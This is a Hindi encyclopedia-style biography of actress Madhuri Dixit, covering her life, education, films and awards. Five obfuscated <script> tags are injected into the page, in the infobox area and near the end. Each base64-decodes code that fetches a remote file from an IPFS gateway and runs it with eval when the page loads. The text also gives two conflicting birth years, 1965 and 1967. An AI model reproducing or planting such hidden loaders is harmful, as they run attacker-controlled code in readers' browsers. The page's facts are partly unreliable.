माधुरी दीक्षित

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
माधुरी दीक्षित
माधुरी दीक्षित
पूरा नाम माधुरी दीक्षित नेने
प्रसिद्ध नाम माधुरी दीक्षित
जन्म 15 मई, 1965
जन्म भूमि महाराष्ट्र
अभिभावक शंकर दीक्षित और स्नेहलता दीक्षित
पति/पत्नी डॉ. श्रीराम चंद्र नेने
कर्म भूमि मुम्बई
कर्म-क्षेत्र अभिनेत्री, कत्थक नृत्यांगना
मुख्य फ़िल्में दयावान, राम लखन, दिल, साजन, बेटा, खलनायक, हम आपके हैं कौन, दिल तो पागल है, देवदास (2002) आदि
शिक्षा स्नातक
विद्यालय मुम्बई विश्वविद्यालय
पुरस्कार-उपाधि पद्मश्री, चार बार सर्वश्रेष्ठ अभिनेत्री फ़िल्मफेयर पुरस्कार
विशेष योगदान माधुरी दीक्षित ने भारतीय हिन्दी फ़िल्मों में एक ऐसा मुकाम तय किया है जिसे आज के अभिनेत्रियाँ अपने लिए आदर्श मानती हैं।
नागरिकता भारतीय
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

माधुरी दीक्षित (अंग्रेज़ी: Madhuri Dixit, जन्म: 15 मई, 1965) हिन्दी फ़िल्मों की एक प्रसिद्ध अभिनेत्री हैं। माधुरी दीक्षित 1987 से 2003 के समय की प्रमुख नायिकाओं में से एक हैं। उनका जन्म शंकर तथा स्नेहलता के परिवार में हुआ था। वे एक प्रशिक्षित कत्थक नृत्यांगना भी हैं। माधुरी दीक्षित ने सन् 1984 में फ़िल्म 'अबोध' से अपने फ़िल्मी जीवन की शुरुआत की।

जीवन परिचय

15 मई, 1967 मुंबई में मराठी परिवार में माधुरी दीक्षित का जन्म हुआ। पिता शंकर दीक्षित और माता स्नेहलता दीक्षित की लाडली माधुरी को बचपन से डॉक्टर बनने की चाह थी और शायद यह भी एक वज़ह रही कि माधुरी ने अपना जीवन साथी श्रीराम नेने को चुना जो कि पेशे से एक चिकित्सक हैं। माधुरी दीक्षित ने भारतीय हिन्दी फ़िल्मों में एक ऐसा मुकाम तय किया है जिसे आज की अभिनेत्रियाँ अपने लिए आदर्श मानती हैं।

शिक्षा

डिवाइन चाइल्ड हाई स्कूल से पढ़ने के बाद माधुरी दीक्षित ने मुंबई यूनिवर्सिटी से स्नातक की शिक्षा पूरी की। बचपन से ही उन्हें नृत्य में रुचि थी जिसके लिए माधुरी ने आठ वर्ष से ही प्रशिक्षण लेना शुरू कर दिया। 80 और 90 के दशक में इन्होंने स्वयं को हिन्दी सिनेमा मे एक प्रमुख अभिनेत्री तथा सुप्रसिद्ध नृत्यांगना के रूप में अपने आपको स्थापित किया। उनके नृत्य और स्वाभाविक अभिनय का जादू ऐसा चला कि ये पूरे देश की धड़कन बन गयीं।

फ़िल्मी सफ़र

माधुरी दीक्षित ने सन् 1984 में फ़िल्म 'अबोध' से अपने फ़िल्मी जीवन की शुरुआत की। अभिनेत्री के रूप में उनकी पहली फ़िल्म 'तेज़ाब' थी। 'तेज़ाब' फ़िल्म से ही उन्हें अपनी पहली सफलता मिली और वे बॉलीवुड की जानी मानी अभिनेत्रियों में गिनी जाने लगीं। माधुरी दीक्षित ने दयावान, राम लखन, दिल, साजन, बेटा, खलनायक, हम आपके हैं कौन आदि सफल फ़िल्मों में भी अभिनय किया है।

पुरस्कार

सन 2008 में उन्हें भारत सरकार के चतुर्थ सर्वोच्च नागारिक सम्मान पद्मश्री से सम्मनित किया गया। माधुरी दीक्षित को सन 2001 में नेशनल सिटीजन्स पुरस्कार की उपाधि से सम्मानित किया गया था।[1]

माधुरी दीक्षित की प्रमुख फ़िल्में
वर्ष फ़िल्म
1984 अबोध
1985 आवारा बाप
1986 स्वाति
1987 हिफाजत
1988 उत्तर दक्षिण मोहरे
1988 खतरों के खिलाड़ी
1988 दयावान
1988 तेजाब
1989 वर्दी
1989 राम लखन
1989 प्रेम प्रतिज्ञा
1989 मुजरिम
1989 त्रिदेव
1989 क़ानून अपना अपना
1989 परिंदा
1989 पाप का अंत
1990 महा संग्राम,
1990 किस्से कहानियाँ
1990 इज्जतदार
1990 दिल दीवाना
1990 मुझ सा नहीं
1990 जीवन एक संघर्ष
1990 सैलाब
1990 जमाई राजा
1990 नेदार
1991 प्यार का देवता
1990 100 डेज
1990 प्रतिकार
1990 साजन
1990 प्रहार
1992 बेटा
1992 ज़िंदगी एक जुआ
1992 प्रेम दीवाने
1992 खेल
1992 संगीत
1993 धारावी
1993 साहिबां
1993 खलनायक
1993 फूल
1993 दिल तेरा आशिक
1993 आँसू बने अंगारे
1994 अनजान
1994 हम आपके हैं कौन
1995 राजा
1995 याराना
1996 राजकुमार
1996 प्रेम ग्रंथ
1996 पापी देवता
1997 कोयला
1997 महानता
1997 मृत्युदंड
1997 मोहब्बत
1997 दिल तो पागल है
1998 बड़े मियाँ छोटे मियाँ
1998 वजूद
2000 पुकार
2000 गज गामिनी
2001 ये रास्ते हैं प्यार के
2002 लज्जा
2002 हम तुम्हारे हैं सनम
2002 देवदास
माधुरी दीक्षित को दिये गये पुरस्कार
सन पुरस्कार नाम फ़िल्म नाम
1990 सर्वश्रेष्ठ अभिनेत्री फ़िल्मफेयर एवार्ड्स दिल
1992 सर्वश्रेष्ठ अभिनेत्री फ़िल्मफेयर एवार्ड्स बेटा
1994 सर्वश्रेष्ठ अभिनेत्री हम आपके हैं कौन
1997 सर्वश्रेष्ठ अभिनेत्री दिल तो पागल है
2002 सर्वश्रेष्ठ सहायक अभिनेत्री देवदास
1995 सर्वश्रेष्ठ अभिनेत्री स्टार स्क्रीन एवार्ड्स हम आपके हैं कौन
1996 सर्वश्रेष्ठ अभिनेत्री स्टार स्क्रीन एवार्ड्स राजा
1998 सर्वश्रेष्ठ अभिनेत्री स्टार स्क्रीन एवार्ड्स मृत्युदंड
2003 सर्वश्रेष्ठ सहायक अभिनेत्री स्टार स्क्रीन एवार्ड्स देवदास
1998 सर्वश्रेष्ठ अभिनेत्री जी सिने एवार्ड्स दिल तो पागल है
2002 सर्वश्रेष्ठ सहायक अभिनेत्री जी सिने एवार्ड्स लज्जा


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. माधुरी दीक्षित (हिन्दी) हिन्दी वेबसाइट। अभिगमन तिथि: 5 मार्च, 2012

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>